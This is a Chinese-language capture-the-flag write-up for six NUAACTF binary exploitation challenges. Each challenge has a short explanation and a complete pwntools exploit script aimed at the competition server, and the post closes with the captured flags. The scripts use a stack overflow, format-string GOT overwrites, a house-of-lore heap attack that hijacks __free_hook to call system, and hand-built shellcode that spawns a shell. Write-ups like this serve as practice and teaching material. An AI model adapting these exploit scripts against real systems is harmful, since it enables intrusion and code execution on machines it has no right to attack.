NUAACTF

除了最后一个手搓shellcode不习惯,没做出来,其他还好,RCTF打自闭,过来找找感觉(对,WTCL

pwn1

溢出到另外一个变量绕过判断

1
from pwn import*
2
p = remote('49.235.243.206',10501)
3
p.send('1'*0x28)
4
p.interactive()

Download

MAIN EXP

pwn2

libc2.23中,其中0xF02A4与0xF1147与read函数的偏移是最接近的,直接爆破后面两个字节

1
from pwn import*
2
payload = '%65c%12$hhn%6c%13$hhn'
3
payload = payload.ljust(0x20,'\x00')
4
payload += p64(0x601028 + 1) + p64(0x601028)
5
p = process('./main')
6
p = remote('49.235.243.206',10502)
7
p.sendline(payload)
8
p.interactive()

Download

MAIN EXP

pwn3

栈溢出,还带后门,简单

1
from pwn import*
2
p = process('./main')
3
b = 0x4007FB
4
p = remote('49.235.243.206',10503)
5
payload = '\x00'*0x20 + p64(0x40) + p64(b)
6
p.send(payload)
7
p.interactive()

Download

MAIN EXP

pwn4

house of lore模板题

1
from pwn import*
2
context.log_level ='DEBUG'
3
def name(data1,data2):
4
	p.sendlineafter('choice:','0')
5
	p.sendafter('name?',data1)
6
	p.sendafter('desc?',data2)
7
def new(size):
8
	p.sendlineafter('choice:','1')
9
	p.sendlineafter('message?',str(size))
10
def free(index):
11
	p.sendlineafter('choice:','2')
12
	p.sendlineafter('deleted?',str(index))
13
def edit(index,content):
14
	p.sendlineafter('choice:','3')
15
	p.sendlineafter('modified?',str(index))
16
	p.sendafter('message?',content)
17
def show(index):
18
	p.sendlineafter('choice:','4')
19
	p.sendlineafter('showed?',str(index))
20
p = process('./main')
21
p = remote('49.235.243.206',10504)
22
libc =ELF('./libc-2.23.so')
23
new(0x80)
24
new(0x200)
25
new(0x100)
26
free(0)
27
show(0)
28
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - 0x10 - 88 -libc.sym['__malloc_hook']
29
new(0x80)
30
p.recvuntil('Ptr: ')
31
heap_base = int(('0x' + p.recvuntil('\n',drop=True)),16) - 0x10
32
log.info('LIBC:\t' + hex(libc_base))
33
log.info('HEAP:\t' + hex(heap_base))
34
free(1)
35
new(0x300)
36
victim = heap_base + 0x90
37
fake_chunk2 = 0x602100
38
fake_chunk1 = 0x602120
39
name(p64(0) + p64(0x211) + p64(fake_chunk1),p64(0) + p64(0x211) + p64(victim) + p64(fake_chunk2))
40
edit(1,p64(0) + p64(fake_chunk1))
41
new(0x200)
42
new(0x200)
43
free_hook = libc_base + libc.sym['__free_hook']
44
system = libc_base + libc.sym['system']
45
edit(6,'\x00'*0x10 + p64(free_hook))
46
edit(0,p64(system))
47
edit(1,'/bin/sh\x00')
48
free(1)
49
p.interactive()

Download

MAIN EXP

pwn5

利用RBP的一个链,在栈上写上一个read_got,然后一次性改了read就行

1
from pwn import*
2
p = process('./main')
3
p = remote('49.235.243.206',10505)
4
libc =ELF('./libc-2.23.so')
5
payload = 'LIBC:%11$pStack:%8$p'
6
p.sendline(payload)
7
p.recvuntil('LIBC:')
8
libc_base = int(p.recv(14),16) - libc.sym['__libc_start_main'] - 240
9
log.info('LIBC:\t' + hex(libc_base))
10
p.recvuntil('Stack:')
11
target = int(p.recv(14),16)
12
log.info('TARGET:\t' + hex(target))
13
rce = libc_base + 0xF02A4
14
read = 0x601020
15
def modify(addr,data):
16
	p.sendline(addr)
17
	sleep(0.1)
18
	p.sendline(data)
19
	sleep(0.1)
20
modify('%' + str((target-8 + 2)&0xFF) + 'c%6$hhnFMYY','%' + str((read>>16)&0xFF) + 'c%8$hhnFMYY')
21
modify('%' + str((target-8 + 1)&0xFF) + 'c%6$hhnFMYY','%' + str((read>>8)&0xFF) + 'c%8$hhnFMYY')
22
modify('%' + str((target-8 + 0)&0xFF) + 'c%6$hhnFMYY','%' + str((read)&0xFF) + 'c%8$hhnFMYY')
23
p.sendline('%' + str(rce&0xFFFF) + 'c%9$hn\x00')
24
p.interactive()

Download

MAIN EXP

pwn6

问了binLep师傅才知道的,太菜了,后面需要去搓搓shellcode了,哎……
就是一个写一段汇编从而绕过字符的范围判断,一开始让字符位于可见字符范围内,然后在汇编里面进行单字节修改到想要的字符串

1
#!/usr/bin/env python
2
# -*- coding: utf-8 -*-
3
from pwn import *
4
p = process('./main')
5
p = remote('49.235.243.206', 10506)
6
context.arch ='AMD64'
7
shell = asm('''
8
push 0x70
9
pop rdx
10
push rdi
11
push rdi
12
push rdi
13
sub byte ptr [rsi + 0x22], dl
14
sub byte ptr [rsi + 0x2A], dl
15
sub byte ptr [rsi + 0x2E], dl
16
sub byte ptr [rsi + 0x2F], dl
17
sub byte ptr [rsi + 0x45], dl
18
sub byte ptr [rsi + 0x45], dl
19
sub byte ptr [rsi + 0x45], dl
20
pop rsi
21
pop rsi
22
pop rdx
23
push 0x3b
24
pop rax
25
''')
26
shell += "\x48\x2F\x2F\x62\x69\x6E\x2F\x73\x68\x70"
27
shell += asm("""
28
push rdi
29
push rsp
30
pop rdi
31
""")
32
shell += "\x7F\x75" #syscall
33
p.send(shell)
34
p.interactive()

Download

MAIN EXP

FLAG

1
pwn1:
2
flag{1325777C4AD2FC214638AFACD632CAB9}
3
pwn2:
4
flag{7221CB4A535A0F5E4C47F5FEEC64C952}
5
pwn3:
6
flag{E291A9922B72C69900DC4D0BB1E29BDE}
7
pwn4:
8
flag{38E0B6A2926319DAE8EBF1DCD161A331}
9
pwn5:
10
flag{3DD8600C697604883D8FF17048A6AF37}
11
pwn6:
12
flag{A1191C435648EFFC09A90A8A113117A3}
Contents
 1. 1. pwn1
  1. 1.1. Download
 2. 2. pwn2
  1. 2.1. Download
 3. 3. pwn3
  1. 3.1. Download
 4. 4. pwn4
  1. 4.1. Download
 5. 5. pwn5
  1. 5.1. Download
 6. 6. pwn6
  1. 6.1. Download
 7. 7. FLAG
|